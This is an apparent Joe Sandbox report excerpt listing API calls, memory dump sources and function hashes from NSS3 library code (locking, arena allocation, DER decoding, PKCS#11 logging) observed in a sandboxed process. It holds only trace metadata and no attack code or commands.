                                                                                • TlsGetValue.KERNEL32 ref: 6CFC7CA0
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC7CB4
                                                                                • PR_Unlock.NSS3 ref: 6CFC7CCF
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC7D04
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC7D1B
                                                                                • realloc.MOZGLUE(-00000050), ref: 6CFC7D82
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC7DF4
                                                                                • PR_Unlock.NSS3 ref: 6CFC7E0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                • String ID:
                                                                                • API String ID: 2305085145-0
                                                                                • Opcode ID: 53c2d7f059d7472616158b1e3bb3dd7af195eef0c1f7c571e1f110335b2be5b2
                                                                                • Instruction ID: 3b962536881f0b693c25bd19461250018e944ae7ae9c16815975f8704305dcfd
                                                                                • Opcode Fuzzy Hash: 53c2d7f059d7472616158b1e3bb3dd7af195eef0c1f7c571e1f110335b2be5b2
                                                                                • Instruction Fuzzy Hash: 9851F7B2B08102DFDB109F25ED42B6777B5FB43328F15412BDE1547652EBB19460CB92
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D11
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D2A
                                                                                • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D4A
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D57
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D97
                                                                                • PR_Lock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DBA
                                                                                • PR_WaitCondVar.NSS3 ref: 6CF34DD4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DE6
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                • String ID:
                                                                                • API String ID: 3388019835-0
                                                                                • Opcode ID: 6b1e6759678ab60b52e83a22feb54b9d9f719d1093d316b0f3508f378e8fd689
                                                                                • Instruction ID: b0c0e509bbc6a2bb053bfce4db039c2da1d3426c41faaa5d3a4c67843279a815
                                                                                • Opcode Fuzzy Hash: 6b1e6759678ab60b52e83a22feb54b9d9f719d1093d316b0f3508f378e8fd689
                                                                                • Instruction Fuzzy Hash: 16418AB2908665DFCB00AF78E584259BFB4FF46314F064669DC989B710EBB198C0CBD1
                                                                                APIs
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CFFDE64), ref: 6CFFED0C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFFED22
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6CFFED4A
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6CFFED6B
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFFED38
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6CFFED52
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFFED83
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6CFFED95
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6CFFED9D
                                                                                  • Part of subcall function 6D0164F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6D01127C,00000000,00000000,00000000), ref: 6D01650E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3323615905-3315324353
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitToken), ref: 6CFE2CEC
                                                                                • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CFE2D07
                                                                                  • Part of subcall function 6D0C09D0: PR_Now.NSS3 ref: 6D0C0A22
                                                                                  • Part of subcall function 6D0C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D0C0A35
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D0C0A66
                                                                                  • Part of subcall function 6D0C09D0: PR_GetCurrentThread.NSS3 ref: 6D0C0A70
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D0C0A9D
                                                                                  • Part of subcall function 6D0C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D0C0AC8
                                                                                  • Part of subcall function 6D0C09D0: PR_vsmprintf.NSS3(?,?), ref: 6D0C0AE8
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0B19
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0B48
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0C76
                                                                                  • Part of subcall function 6D0C09D0: PR_LogFlush.NSS3 ref: 6D0C0C7E
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE2D22
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0B88
                                                                                  • Part of subcall function 6D0C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0C0C5D
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D0C0C8D
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0C9C
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0CD1
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D0C0CEC
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0CFB
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0D16
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D0C0D26
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0D35
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D0C0D65
                                                                                  • Part of subcall function 6D0C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D0C0D70
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0D90
                                                                                  • Part of subcall function 6D0C09D0: free.MOZGLUE(00000000), ref: 6D0C0D99
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE2D3B
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D0C0BAB
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0BBA
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0D7E
                                                                                • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CFE2D54
                                                                                  • Part of subcall function 6D0C09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0C0BCB
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0BDE
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0C16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                • API String ID: 420000887-1567254798
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6D024DCB
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6D024DE1
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6D024DFF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D024E59
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0E300C,00000000), ref: 6D024EB8
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6D024EFF
                                                                                • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6D024F56
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D02521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 1025791883-0
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(6D022C2A), ref: 6D020C81
                                                                                  • Part of subcall function 6D00BE30: SECOID_FindOID_Util.NSS3(6CFC311B,00000000,?,6CFC311B,?), ref: 6D00BE44
                                                                                  • Part of subcall function 6CFF8500: SECOID_GetAlgorithmTag_Util.NSS3(6CFF95DC,00000000,00000000,00000000,?,6CFF95DC,00000000,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF8517
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020CC4
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D020CD5
                                                                                • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6D020D1D
                                                                                • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6D020D3B
                                                                                • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6D020D7D
                                                                                • free.MOZGLUE(00000000), ref: 6D020DB5
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020DC1
                                                                                • free.MOZGLUE(00000000), ref: 6D020DF7
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020E05
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D020E0F
                                                                                  • Part of subcall function 6CFF95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF95E0
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF95F5
                                                                                  • Part of subcall function 6CFF95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CFF9609
                                                                                  • Part of subcall function 6CFF95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFF961D
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetInternalSlot.NSS3 ref: 6CFF970B
                                                                                  • Part of subcall function 6CFF95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFF9756
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetIVLength.NSS3(?), ref: 6CFF9767
                                                                                  • Part of subcall function 6CFF95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CFF977E
                                                                                  • Part of subcall function 6CFF95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFF978E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                • String ID:
                                                                                • API String ID: 3136566230-0
                                                                                APIs
                                                                                • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CFCFCBD
                                                                                • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CFCFCCC
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CFCFCEF
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFCFD32
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CFCFD46
                                                                                • PORT_Alloc_Util.NSS3(00000001), ref: 6CFCFD51
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CFCFD6D
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFCFD84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                • String ID: :
                                                                                • API String ID: 183580322-336475711
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestInit), ref: 6CFE6C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE6C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE6CA3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE6CB9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CFE6CD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                • API String ID: 1003633598-3690128261
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CFE9DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE9E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE9E33
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE9E49
                                                                                • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CFE9E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                • API String ID: 1003633598-1678415578
                                                                                • Opcode ID: 9b609197b3d933d084df9a7f429b9995c3d8901b4ba245c3ce444ae2eee620fd
                                                                                • Instruction ID: 102e148a62dc7504840546d0dd5eaecfa3fdbb738b90f748dd6e4e791d235904
                                                                                • Opcode Fuzzy Hash: 9b609197b3d933d084df9a7f429b9995c3d8901b4ba245c3ce444ae2eee620fd
                                                                                • Instruction Fuzzy Hash: 8A210AB1901204AFE710DB55ED86BEE3775EB4A30DF054029EA19A7252DFB09A44C7B2
                                                                                APIs
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,6CFB7D8F,6CFB7D8F,?,?), ref: 6CFB6DC8
                                                                                  • Part of subcall function 6D00FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D00FE08
                                                                                  • Part of subcall function 6D00FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D00FE1D
                                                                                  • Part of subcall function 6D00FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D00FE62
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CFB7D8F,?,?), ref: 6CFB6DD5
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FA0,00000000,?,?,?,?,6CFB7D8F,?,?), ref: 6CFB6DF7
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CFB6E35
                                                                                  • Part of subcall function 6D00FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D00FE29
                                                                                  • Part of subcall function 6D00FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D00FE3D
                                                                                  • Part of subcall function 6D00FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6D00FE6F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CFB6E4C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FE0,00000000), ref: 6CFB6E82
                                                                                  • Part of subcall function 6CFB6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CFBB21D,00000000,00000000,6CFBB219,?,6CFB6BFB,00000000,?,00000000,00000000,?,?,?,6CFBB21D), ref: 6CFB6B01
                                                                                  • Part of subcall function 6CFB6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CFB6B8A
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CFB6F1E
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CFB6F35
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FE0,00000000), ref: 6CFB6F6B
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,6CFB7D8F,?,?), ref: 6CFB6FE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 587344769-0
                                                                                • Opcode ID: 13456bcc61c491e32dbba9fa177ebaf46d62aa07442bda7204859262193e65b3
                                                                                • Instruction ID: 825fcf0350d18584a60703d3b0c93e574de490ffd501b465a3d05c3d76139301
                                                                                • Opcode Fuzzy Hash: 13456bcc61c491e32dbba9fa177ebaf46d62aa07442bda7204859262193e65b3
                                                                                • Instruction Fuzzy Hash: 49719271D142469FEB04CF56CD40BAA7BA8FF94348F15422AF918E7611F770EA94CB90
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE10
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE24
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,6CFDD079,00000000,00000001), ref: 6CFFAE5A
                                                                                • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE6F
                                                                                • free.MOZGLUE(85145F8B,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE7F
                                                                                • TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEB1
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEC9
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEF1
                                                                                • free.MOZGLUE(6CFDCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?), ref: 6CFFAF0B
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                • String ID:
                                                                                • API String ID: 161582014-0
